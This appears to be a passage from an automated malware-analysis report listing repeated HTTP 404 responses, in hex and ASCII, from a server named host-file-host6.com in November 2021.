                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 42 d4 f6 26 86 24 eb ad 94 50 2b e4 b6 40 22 e3 b3 b4 68 f4 99 bd 5c ae 75 96 cc 33 4b 5c 3f 08 4a df bb 34 e0 a8 54 d9 b1 c2 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 61I:82OB%,YR("XQB&$P+@"h\u3K\?J4T0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 18 Nov 2021 09:30:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0
